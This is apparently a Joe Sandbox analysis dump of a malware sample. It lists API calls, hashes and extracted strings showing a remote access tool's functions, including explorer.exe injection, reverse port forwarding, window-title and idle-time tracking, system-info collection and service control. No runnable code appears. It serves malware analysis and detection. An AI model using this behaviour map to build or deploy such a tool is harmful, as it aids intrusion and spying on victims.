                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 65535$udp
                                                  • API String ID: 0-1267037602
                                                  • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                  • Instruction ID: 2e1a3db348e843641117c364f401227eb89708bf0a4530a738cb41f0c116e1d2
                                                  • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                  • Instruction Fuzzy Hash: 0B412871288301AFE7249A28D9C4FBB77E8EF85744F04447DFAA5A32D5E7E5C840C662
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                  • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                  • __dosmaperr.LIBCMT ref: 004393CD
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                  • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                  • __dosmaperr.LIBCMT ref: 0043940A
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                  • __dosmaperr.LIBCMT ref: 0043945E
                                                  • _free.LIBCMT ref: 0043946A
                                                  • _free.LIBCMT ref: 00439471
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                  • String ID:
                                                  • API String ID: 2441525078-0
                                                  • Opcode ID: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                  • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                  • Opcode Fuzzy Hash: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                  • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,020F1D3F,?,00000050,00465290,00000000), ref: 02129620
                                                  • GetLastError.KERNEL32(?,?,020F1D3F,?,00000050,00465290,00000000), ref: 0212962D
                                                  • __dosmaperr.LIBCMT ref: 02129634
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,020F1D3F,?,00000050,00465290,00000000), ref: 02129660
                                                  • GetLastError.KERNEL32(?,?,?,020F1D3F,?,00000050,00465290,00000000), ref: 0212966A
                                                  • __dosmaperr.LIBCMT ref: 02129671
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,00465290,00000000,00000000,?,?,?,?,?,?,020F1D3F,?), ref: 021296B4
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,020F1D3F,?,00000050,00465290,00000000), ref: 021296BE
                                                  • __dosmaperr.LIBCMT ref: 021296C5
                                                  • _free.LIBCMT ref: 021296D1
                                                  • _free.LIBCMT ref: 021296D8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                  • String ID:
                                                  • API String ID: 2441525078-0
                                                  • Opcode ID: 7dca9c723f0a3f3e5eee78a7163c4708e0db19878e5bf6bf14be5ff931373868
                                                  • Instruction ID: 41fb4a5ab13b7367798e6c4e3eec0f09e5590613313cfd390e9db70453ea5a9b
                                                  • Opcode Fuzzy Hash: 7dca9c723f0a3f3e5eee78a7163c4708e0db19878e5bf6bf14be5ff931373868
                                                  • Instruction Fuzzy Hash: 6831BF7254429ABFDF126FA8DC44DAE3BBEEF05364F200169F82056250EB31C960DFA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$1$2$3$4$5$6$7
                                                  • API String ID: 0-3177665633
                                                  • Opcode ID: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                  • Instruction ID: 1dabe03ecb476999e7dfd44d3e7b5734bbb7e5966a2f1b037bfd88aaf18037c1
                                                  • Opcode Fuzzy Hash: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                  • Instruction Fuzzy Hash: 6561DF715CD301AED714EF20D891AEB7BA5BF95310F41880DFA91572E1EB709A08DBA3
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                  • TranslateMessage.USER32(?), ref: 00404F30
                                                  • DispatchMessageA.USER32(?), ref: 00404F3B
                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                  • API String ID: 2956720200-749203953
                                                  • Opcode ID: 64aaecef7f8444256305cfeddf957dd1b74104bd130fd80cce60da9c96c87755
                                                  • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                  • Opcode Fuzzy Hash: 64aaecef7f8444256305cfeddf957dd1b74104bd130fd80cce60da9c96c87755
                                                  • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 020F50D8
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 020F5188
                                                  • TranslateMessage.USER32(?), ref: 020F5197
                                                  • DispatchMessageA.USER32(?), ref: 020F51A2
                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 020F525A
                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 020F5292
                                                    • Part of subcall function 020F46CF: send.WS2_32(?,00000000,00000000,00000000), ref: 020F4764
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                  • API String ID: 2956720200-749203953
                                                  • Opcode ID: 0622db17b8ffedd3531a9fa1e5e3f576bb625bfe4daf1fd40acc4f0bc4360242
                                                  • Instruction ID: 86b75ee8b9c03e0aa669e8a00adac0408b3834a96641a980df9b58814306eb58
                                                  • Opcode Fuzzy Hash: 0622db17b8ffedd3531a9fa1e5e3f576bb625bfe4daf1fd40acc4f0bc4360242
                                                  • Instruction Fuzzy Hash: C041C572684300AFC795FB74DC548AF7BEAAB85710F40052CFA06879A4EF34DA05EB56
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                  • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00416EF0
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                  • String ID: <$@$@FG$@FG$Temp
                                                  • API String ID: 1107811701-2245803885
                                                  • Opcode ID: e063231c4d64aecbcfe8c05d05ac103388c964f325b6d9d8871a37430f73297a
                                                  • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                  • Opcode Fuzzy Hash: e063231c4d64aecbcfe8c05d05ac103388c964f325b6d9d8871a37430f73297a
                                                  • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 0210718B
                                                  • CloseHandle.KERNEL32(00000000), ref: 02107194
                                                  • DeleteFileA.KERNEL32(00000000), ref: 021071A3
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 02107157
                                                    • Part of subcall function 020F46CF: send.WS2_32(?,00000000,00000000,00000000), ref: 020F4764
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                  • String ID: <$@$@FG$@FG$TUF
                                                  • API String ID: 1107811701-3315534519
                                                  • Opcode ID: c09cddb986173b223f0ae78b0a5cb3d5da982f6b9b7ae30d07bc44f4aa3a3996
                                                  • Instruction ID: 323cd0a681aedd58ceac20a0df12ff891dcd3439c423cafce39a8a933bf5882e
                                                  • Opcode Fuzzy Hash: c09cddb986173b223f0ae78b0a5cb3d5da982f6b9b7ae30d07bc44f4aa3a3996
                                                  • Instruction Fuzzy Hash: 7B318D31A802099FDB54FBA4DC96AEE7736AF50300F004168EA06664E4EF745E8ADF95
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                  • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\Desktop\yPIOW6yoPi.exe), ref: 00406705
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentProcess
                                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                  • API String ID: 2050909247-4145329354
                                                  • Opcode ID: ae628e6cf13d6acf56a74fe03314e9eaaf54e5537fc186528355c397fff7ef9b
                                                  • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                  • Opcode Fuzzy Hash: ae628e6cf13d6acf56a74fe03314e9eaaf54e5537fc186528355c397fff7ef9b
                                                  • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                  • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                  • Opcode Fuzzy Hash: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                  • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                  APIs
                                                  • _free.LIBCMT ref: 00446DDF
                                                    • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                  • _free.LIBCMT ref: 00446DEB
                                                  • _free.LIBCMT ref: 00446DF6
                                                  • _free.LIBCMT ref: 00446E01
                                                  • _free.LIBCMT ref: 00446E0C
                                                  • _free.LIBCMT ref: 00446E17
                                                  • _free.LIBCMT ref: 00446E22
                                                  • _free.LIBCMT ref: 00446E2D
                                                  • _free.LIBCMT ref: 00446E38
                                                  • _free.LIBCMT ref: 00446E46
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                  • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                  • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                  • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                  APIs
                                                  • _free.LIBCMT ref: 02137046
                                                    • Part of subcall function 02136D2C: HeapFree.KERNEL32(00000000,00000000,?,0213FCB7,?,00000000,?,00000000,?,0213FF5B,?,00000007,?,?,0214046C,?), ref: 02136D42
                                                    • Part of subcall function 02136D2C: GetLastError.KERNEL32(?,?,0213FCB7,?,00000000,?,00000000,?,0213FF5B,?,00000007,?,?,0214046C,?,?), ref: 02136D54
                                                  • _free.LIBCMT ref: 02137052
                                                  • _free.LIBCMT ref: 0213705D
                                                  • _free.LIBCMT ref: 02137068
                                                  • _free.LIBCMT ref: 02137073
                                                  • _free.LIBCMT ref: 0213707E
                                                  • _free.LIBCMT ref: 02137089
                                                  • _free.LIBCMT ref: 02137094
                                                  • _free.LIBCMT ref: 0213709F
                                                  • _free.LIBCMT ref: 021370AD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                  • Instruction ID: 6f71c6999dbd5474d9d2ab0d6bb1064a7f7dc97682c71175f44b2edee0ca7bca
                                                  • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                  • Instruction Fuzzy Hash: DA115D76540148BFCB42EFA5D841C993FBAAF05360B5190A5BA488F261DB33EE50DF88
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02101F01
                                                    • Part of subcall function 0210AD9F: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,020F3CA7), ref: 0210ADC6
                                                    • Part of subcall function 0210791D: CloseHandle.KERNEL32(020F3D20,?,?,020F3D20,00465324), ref: 02107933
                                                    • Part of subcall function 0210791D: CloseHandle.KERNEL32($SF,?,?,020F3D20,00465324), ref: 0210793C
                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 021021F8
                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 0210222F
                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 0210226B
                                                    • Part of subcall function 020F46CF: send.WS2_32(?,00000000,00000000,00000000), ref: 020F4764
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                  • String ID: HDG$HDG$>G$>G
                                                  • API String ID: 1937857116-1666402509
                                                  • Opcode ID: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                  • Instruction ID: 5b204cc2eacef3de9999a8264106d2bcc2cd21195162e62e13f69c3be7b60818
                                                  • Opcode Fuzzy Hash: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                  • Instruction Fuzzy Hash: CA0246312883414FD3A9FB60D8A0BEF73D6AFD4300F50482DEA8A46995EF705A49DF56
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Eventinet_ntoa
                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                  • API String ID: 3578746661-4192532303
                                                  • Opcode ID: da4141fd40dea034988e8bac021007fe1b9853023a15964e36e684bacbed286c
                                                  • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                  • Opcode Fuzzy Hash: da4141fd40dea034988e8bac021007fe1b9853023a15964e36e684bacbed286c
                                                  • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Eventinet_ntoa
                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                  • API String ID: 3578746661-4192532303
                                                  • Opcode ID: a05e0ddbe8dc3814f036cc210c9733109e43822c73ea3fc4ff0ab9c9ada38e94
                                                  • Instruction ID: 12af8005f34c455253ae226c2143434232bccb9c1c7136d168a635efef878c1a
                                                  • Opcode Fuzzy Hash: a05e0ddbe8dc3814f036cc210c9733109e43822c73ea3fc4ff0ab9c9ada38e94
                                                  • Instruction Fuzzy Hash: 2C510831A843509FC754F738D8997BE36A6AF84300F410529E94A87AE0EF74AD45DFC6
                                                  APIs
                                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0210A519
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0210A555
                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000), ref: 0210A566
                                                  • SetEvent.KERNEL32 ref: 0210A5F1
                                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0210A602
                                                  • CloseHandle.KERNEL32 ref: 0210A612
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Event$CloseCreateExistsFileHandleObjectPathSendSingleStringWait
                                                  • String ID: TUF$open "
                                                  • API String ID: 1811012380-2979349893
                                                  • Opcode ID: afa000e900512d794b59872f8fe6b6e7421b33da501b9bd85e28326864c8fc87
                                                  • Instruction ID: 4cf60a87e7bc85a389d11d70e9257b6a53c73fed0d9a0ef7f77bafa13ccbd862
                                                  • Opcode Fuzzy Hash: afa000e900512d794b59872f8fe6b6e7421b33da501b9bd85e28326864c8fc87
                                                  • Instruction Fuzzy Hash: 9C51C1712843046ED254FB30EC91EBF3B6EEF84744F10003AFA55969E5EF609D48DAA6
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 020FA6BD
                                                  • Sleep.KERNEL32(000001F4), ref: 020FA6C8
                                                  • GetForegroundWindow.USER32 ref: 020FA6CE
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 020FA6D7
                                                  • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 020FA70B
                                                  • Sleep.KERNEL32(000003E8), ref: 020FA7DB
                                                    • Part of subcall function 020F9FBF: SetEvent.KERNEL32(00000000,?,00000000,020FAB83,00000000), ref: 020F9FEB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                  • String ID: [${ User has been idle for
                                                  • API String ID: 911427763-3934435721
                                                  • Opcode ID: 6d776f70f920023e5288755160ba8f24f5da9fa6db96a00e1421ea32c0579234
                                                  • Instruction ID: ff12954b4fd90bf1761cd49333c1d53d6e5540bda6564c91945ce8b3f8f8f055
                                                  • Opcode Fuzzy Hash: 6d776f70f920023e5288755160ba8f24f5da9fa6db96a00e1421ea32c0579234
                                                  • Instruction Fuzzy Hash: BC51F5317883005FC395FB20C894FAE77E6AB84714F10456DFA4A86AD0DF64AA05DE56
                                                  APIs
                                                  • RtlDecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DecodePointer
                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                  • API String ID: 3527080286-3064271455
                                                  • Opcode ID: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
                                                  • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                  • Opcode Fuzzy Hash: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
                                                  • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                    • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                  • Sleep.KERNEL32(00000064), ref: 00416688
                                                  • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                  • API String ID: 1462127192-2001430897
                                                  • Opcode ID: 826bb05371ff64d740857fa337f72034cbc796444b6efc95c58373138809deed
                                                  • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                  • Opcode Fuzzy Hash: 826bb05371ff64d740857fa337f72034cbc796444b6efc95c58373138809deed
                                                  • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 0210718B
                                                  • CloseHandle.KERNEL32(00000000), ref: 02107194
                                                  • DeleteFileA.KERNEL32(00000000), ref: 021071A3
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 02107157
                                                    • Part of subcall function 020F46CF: send.WS2_32(?,00000000,00000000,00000000), ref: 020F4764
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
